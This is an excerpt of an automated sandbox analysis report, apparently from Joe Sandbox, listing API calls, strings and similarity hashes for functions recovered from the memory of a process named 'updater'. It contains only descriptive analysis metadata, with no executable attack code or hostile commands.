SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C3A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C3A9A7
DestroyWindow.USER32(00000000), ref: 00C3A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BB0000,00000000), ref: 00C3AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C3AA19
GetDesktopWindow.USER32 ref: 00C3AA32
GetWindowRect.USER32(00000000), ref: 00C3AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C3AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C3AA69

Part of subcall function 00BB29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BB29BC

Strings

0, xrefs: 00C3A894
tooltips_class32, xrefs: 00C3A96B, 00C3A9F9

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: abca469ff8bb4065b62c3c6254c21e606a7da638f633cadd1d6874e86ee08b51
Instruction ID: 9d59639ba62fbab54cf2f85a4179c97685dc64998806749d05a700d312137f10
Opcode Fuzzy Hash: abca469ff8bb4065b62c3c6254c21e606a7da638f633cadd1d6874e86ee08b51
Instruction Fuzzy Hash: 1371AB71150204AFD721CF28CC48FAB77E5FB89300F18461DF99A972A1D771EA61EB52

Function 00C3CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

DragQueryPoint.SHELL32(?,?), ref: 00C3CCCF

Part of subcall function 00C3B1A9: ClientToScreen.USER32(01741240,?), ref: 00C3B1D2
Part of subcall function 00C3B1A9: GetWindowRect.USER32(?,?), ref: 00C3B248
Part of subcall function 00C3B1A9: PtInRect.USER32(?,?,00C3C6BC), ref: 00C3B258

SendMessageW.USER32(?,000000B0,?,?), ref: 00C3CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C3CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C3CD66
_wcscat.LIBCMT ref: 00C3CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C3CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 00C3CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 00C3CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 00C3CDFF
DragFinish.SHELL32(?), ref: 00C3CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C3CEF9

Strings

@GUI_DRAGID, xrefs: 00C3CE71
@GUI_DROPID, xrefs: 00C3CE26
@GUI_DRAGFILE, xrefs: 00C3CEA8

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 90e8dc0dd2970c9f3091d84d2ce0b0a40ba5052a2f21587c359c55a525892517
Instruction ID: 2a87100e87cc679b5fdf2b4f25d62b4268b4a033e7da5c2b2e232ddc60067c37
Opcode Fuzzy Hash: 90e8dc0dd2970c9f3091d84d2ce0b0a40ba5052a2f21587c359c55a525892517
Instruction Fuzzy Hash: 14615C71108301AFC711EF64DC85EAFBBE8FF89750F100A2DF695921A2DB709A49CB52

Function 017C5781 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ole32.dll), ref: 017C5787
GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 017C5798
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 017C57A8
GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 017C57B8
GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 017C57C8
GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 017C57D8
GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 017C57E8

Strings

CoInitializeEx, xrefs: 017C57A2
CoCreateInstanceEx, xrefs: 017C5792
ole32.dll, xrefs: 017C5782
CoAddRefServerProcess, xrefs: 017C57B2
CoSuspendClassObjects, xrefs: 017C57E2
CoResumeClassObjects, xrefs: 017C57D2
CoReleaseServerProcess, xrefs: 017C57C2

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
API String ID: 667068680-2233174745
Opcode ID: 3ef0fde0df2e077b1adbb219026c40a3606c77e1ba247c619730e10dbcde5189
Instruction ID: a0b4c9860d759260f70bc1f30cb4cdf1d985e8388270c4e8e690cee17f2cffbc
Opcode Fuzzy Hash: 3ef0fde0df2e077b1adbb219026c40a3606c77e1ba247c619730e10dbcde5189
Instruction Fuzzy Hash: 81F030E07E2302AFA310AF715CEBD6BE6DCD5A4FA0700943D74295610BEFB6BA014710

Function 00C182D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00C1831A
VariantCopy.OLEAUT32(00000000,?), ref: 00C18323
VariantClear.OLEAUT32(00000000), ref: 00C1832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C1841D
__swprintf.LIBCMT ref: 00C1844D
VarR8FromDec.OLEAUT32(?,?), ref: 00C18479
VariantInit.OLEAUT32(?), ref: 00C1852A
SysFreeString.OLEAUT32(?), ref: 00C185BE
VariantClear.OLEAUT32(?), ref: 00C18618
VariantClear.OLEAUT32(?), ref: 00C18627
VariantInit.OLEAUT32(00000000), ref: 00C18665

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00C18447
Default, xrefs: 00C184DA

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: 26c332070c40b7ba36c497cd370eafb116413136097bedcd5493dbd9d85adb50
Instruction ID: 3d520d9e193def250e3fac3b3272884b2e865b93ee4a7a97c1d110d9b9eba58c
Opcode Fuzzy Hash: 26c332070c40b7ba36c497cd370eafb116413136097bedcd5493dbd9d85adb50
Instruction Fuzzy Hash: ADD1D171608115DBDB209F66C484BEEF7B4FF06700F688559E525AB291DF30DD88EBA0

Function 00C349CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00C34A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00C34AAC

Strings

EXISTS, xrefs: 00C34B15
COLLAPSE, xrefs: 00C34AF2
UNCHECK, xrefs: 00C34C88
GETSELECTED, xrefs: 00C34BBC
SELECT, xrefs: 00C34C5D
GETITEMCOUNT, xrefs: 00C34B8E
ISCHECKED, xrefs: 00C34C2F
CHECK, xrefs: 00C34ACC
GETTEXT, xrefs: 00C34BFF
EXPAND, xrefs: 00C34B5E
GETTOTALCOUNT, xrefs: 00C34A93

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 34b55007caa16fa22ad59fc0bd36dba1d217dc0ac9f73d43418848b12ad5c11d
Instruction ID: 5bb6d75de7cb143c509cb1ea439024c7599a869d88e43755c71506bdfaa5edd3
Opcode Fuzzy Hash: 34b55007caa16fa22ad59fc0bd36dba1d217dc0ac9f73d43418848b12ad5c11d
Instruction Fuzzy Hash: E9917D742147019BCB18EF10C491ABAB7E1BF94354F1088A9F8965B3A3DB70FD46DB82

Function 00C1E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00C1E31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 00C1E32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00C1E33B
__wsplitpath.LIBCMT ref: 00C1E399
_wcscat.LIBCMT ref: 00C1E3B1
_wcscat.LIBCMT ref: 00C1E3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C1E3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00C1E3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 00C1E41E
SetCurrentDirectoryW.KERNEL32(?), ref: 00C1E43F
_wcscpy.LIBCMT ref: 00C1E44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C1E48A

Strings

*.*, xrefs: 00C1E445

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: cec4fed3f48fd8a0310fac1054f8374388d31be91bde776cd4a005f81e43b89e
Instruction ID: 11e21ec73770d9d002824a8caf715103624660643cae8ce12483666cd089a4d2
Opcode Fuzzy Hash: cec4fed3f48fd8a0310fac1054f8374388d31be91bde776cd4a005f81e43b89e
Instruction Fuzzy Hash: E0616A715046459FC710EF60C844AAEB3E8FF8A310F04896EF999C7251EB75EA85CB92

Function 00C1A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C1A2C2

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C1A2E3
__swprintf.LIBCMT ref: 00C1A33C
__swprintf.LIBCMT ref: 00C1A355
_wprintf.LIBCMT ref: 00C1A3FC
_wprintf.LIBCMT ref: 00C1A41A

Strings

"%s" (%d) : ==> %s:, xrefs: 00C1A415
"%s" (%d) : ==> %s:%s%s, xrefs: 00C1A3F7
Line %d (File "%s"):, xrefs: 00C1A336, 00C1A34F
Incorrect parameters to object property !, xrefs: 00C1A39E
^ ERROR , xrefs: 00C1A391
Error: , xrefs: 00C1A3C4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 2c79478549c133110267e5cd34df7c8a41f790c890f136da0d3af9c2521cdbac
Instruction ID: f87c949224d2ced24055a0701e5fa0d9c3bdb276a0163a747fcbe10ebd9a4844
Opcode Fuzzy Hash: 2c79478549c133110267e5cd34df7c8a41f790c890f136da0d3af9c2521cdbac
Instruction Fuzzy Hash: DD51D071800109AACF24EBE4CD46FEEB7B8AF05340F1005A9F515B20A3EB756F99DB61

Function 00C10065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00BFF8B8,00000001,0000138C,00000001,00000000,00000001,?,00C23FF9,00000000), ref: 00C1009A
LoadStringW.USER32(00000000,?,00BFF8B8,00000001), ref: 00C100A3

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

GetModuleHandleW.KERNEL32(00000000,00C77310,?,00000FFF,?,?,00BFF8B8,00000001,0000138C,00000001,00000000,00000001,?,00C23FF9,00000000,00000001), ref: 00C100C5
LoadStringW.USER32(00000000,?,00BFF8B8,00000001), ref: 00C100C8
__swprintf.LIBCMT ref: 00C10118
__swprintf.LIBCMT ref: 00C10129
_wprintf.LIBCMT ref: 00C101D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C101E9

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C101CD
Line %d (File "%s"):, xrefs: 00C10112
Error: , xrefs: 00C101A0
^ ERROR, xrefs: 00C1017E
Line %d:, xrefs: 00C10123

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 3ba6edd4e971c490a6d5a8a75db00558564ae680ce36b18c808c9b9bb6c99630
Instruction ID: 155aecaea06ee8f5693f3c0e06c0c11812f9043029f157e486a170df56ec387c
Opcode Fuzzy Hash: 3ba6edd4e971c490a6d5a8a75db00558564ae680ce36b18c808c9b9bb6c99630
Instruction Fuzzy Hash: DD417172800119AACF14EBD4CD86FEEB7BCEF16340F2005A9F505B2092DA756F89DB61

Function 00C1A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00BB4D37: __itow.LIBCMT ref: 00BB4D62
Part of subcall function 00BB4D37: __swprintf.LIBCMT ref: 00BB4DAC

CharLowerBuffW.USER32(?,?), ref: 00C1AA0E
GetDriveTypeW.KERNEL32 ref: 00C1AA5B
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C1AAA3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C1AADA
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C1AB08

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

Strings

open, xrefs: 00C1AA35
close cd wait, xrefs: 00C1AAF3
closed, xrefs: 00C1AA22, 00C1AA2B
set cd door , xrefs: 00C1AAA9
wait, xrefs: 00C1AAC5
type cdaudio alias cd wait, xrefs: 00C1AA86
close, xrefs: 00C1AA14
open , xrefs: 00C1AA6A

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: e30645159f3f6580c3019bfca36c801e210683cdca51187617cbf4136112b616
Instruction ID: 8bbb5938d9afec0fdc5fe8651d4d7f3b5fd16cad49847f5b2f82b9c98e49e66a
Opcode Fuzzy Hash: e30645159f3f6580c3019bfca36c801e210683cdca51187617cbf4136112b616
Instruction Fuzzy Hash: B0516BB11042059FC700EF14C881EAAB3F4FF99358F1089ADF895A7262DB71EE46CB52

Function 00C1A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C1A852
__swprintf.LIBCMT ref: 00C1A874
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C1A8B1
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C1A8D6
_memset.LIBCMT ref: 00C1A8F5
_wcsncpy.LIBCMT ref: 00C1A931
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C1A966
CloseHandle.KERNEL32(00000000), ref: 00C1A971
RemoveDirectoryW.KERNEL32(?), ref: 00C1A97A
CloseHandle.KERNEL32(00000000), ref: 00C1A984

Strings

\, xrefs: 00C1A88A
\??\%s, xrefs: 00C1A86E
:, xrefs: 00C1A895

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: f937362aebc31a3bdfc55ea5a299123d250cc4b968c08cb498178abcc7378640
Instruction ID: 2fd5146d725441471904680cb8c240dcbb6faa25949c83d25d0f4c9551e8dc15
Opcode Fuzzy Hash: f937362aebc31a3bdfc55ea5a299123d250cc4b968c08cb498178abcc7378640
Instruction Fuzzy Hash: BF319275540219ABDB219FA0DC49FEF77BCEF8A710F2041A6F618D21A0E77097849B25

Function 00C3C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00C3982C,?,?), ref: 00C3C0C8
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00C3982C,?,?,00000000,?), ref: 00C3C0DF
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00C3982C,?,?,00000000,?), ref: 00C3C0EA
CloseHandle.KERNEL32(00000000,?,?,?,?,00C3982C,?,?,00000000,?), ref: 00C3C0F7
GlobalLock.KERNEL32(00000000), ref: 00C3C100
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00C3982C,?,?,00000000,?), ref: 00C3C10F
GlobalUnlock.KERNEL32(00000000), ref: 00C3C118
CloseHandle.KERNEL32(00000000,?,?,?,?,00C3982C,?,?,00000000,?), ref: 00C3C11F
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00C3982C,?,?,00000000,?), ref: 00C3C130
OleLoadPicture.OLEAUT32(?,00000000,00000000,00C43C7C,?), ref: 00C3C149
GlobalFree.KERNEL32(00000000), ref: 00C3C159
GetObjectW.GDI32(00000000,00000018,?), ref: 00C3C17D
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00C3C1A8
DeleteObject.GDI32(00000000), ref: 00C3C1D0
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00C3C1E6

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 89422a6a773d62bcff15ebe3313aa9633ba84dcd1514e0b37c1344014cac1324
Instruction ID: 4e55742747e928197755f450db0a057d17c83820512f24a96e2f2910a9fbf8b5
Opcode Fuzzy Hash: 89422a6a773d62bcff15ebe3313aa9633ba84dcd1514e0b37c1344014cac1324
Instruction Fuzzy Hash: D5410975540204AFDB219F65DC8CFAE7BB9FF8A711F204058FA16E72A0DB709A41DB60

Function 00C3C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00C3C8A4
GetFocus.USER32 ref: 00C3C8B4
GetDlgCtrlID.USER32(00000000), ref: 00C3C8BF
_memset.LIBCMT ref: 00C3C9EA
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00C3CA15
GetMenuItemCount.USER32(?), ref: 00C3CA35
GetMenuItemID.USER32(?,00000000), ref: 00C3CA48
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00C3CA7C
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00C3CAC4
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C3CAFC
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00C3CB31

Strings

0, xrefs: 00C3C9E2

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 860d102896170622ef3485188c36d74d37d70a3d10c419c72b09a5555f05531c
Instruction ID: c0873eeb7218f6e0f167b5892fa7e368ac56c057221b3b30820583e2f97f66a3
Opcode Fuzzy Hash: 860d102896170622ef3485188c36d74d37d70a3d10c419c72b09a5555f05531c
Instruction Fuzzy Hash: FA816C712183059FD710DF14C885BAEBBE8FB88354F10496DF9A9A3291D730DA05DBA2

Function 00C08ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C08E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C08E3C
Part of subcall function 00C08E20: GetLastError.KERNEL32(?,00C08900,?,?,?), ref: 00C08E46
Part of subcall function 00C08E20: GetProcessHeap.KERNEL32(00000008,?,?,00C08900,?,?,?), ref: 00C08E55
Part of subcall function 00C08E20: HeapAlloc.KERNEL32(00000000,?,00C08900,?,?,?), ref: 00C08E5C
Part of subcall function 00C08E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C08E73

Part of subcall function 00C08EBD: GetProcessHeap.KERNEL32(00000008,00C08916,00000000,00000000,?,00C08916,?), ref: 00C08EC9
Part of subcall function 00C08EBD: HeapAlloc.KERNEL32(00000000,?,00C08916,?), ref: 00C08ED0
Part of subcall function 00C08EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C08916,?), ref: 00C08EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C08B2E
_memset.LIBCMT ref: 00C08B43
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C08B62
GetLengthSid.ADVAPI32(?), ref: 00C08B73
GetAce.ADVAPI32(?,00000000,?), ref: 00C08BB0
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C08BCC
GetLengthSid.ADVAPI32(?), ref: 00C08BE9
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C08BF8
HeapAlloc.KERNEL32(00000000), ref: 00C08BFF
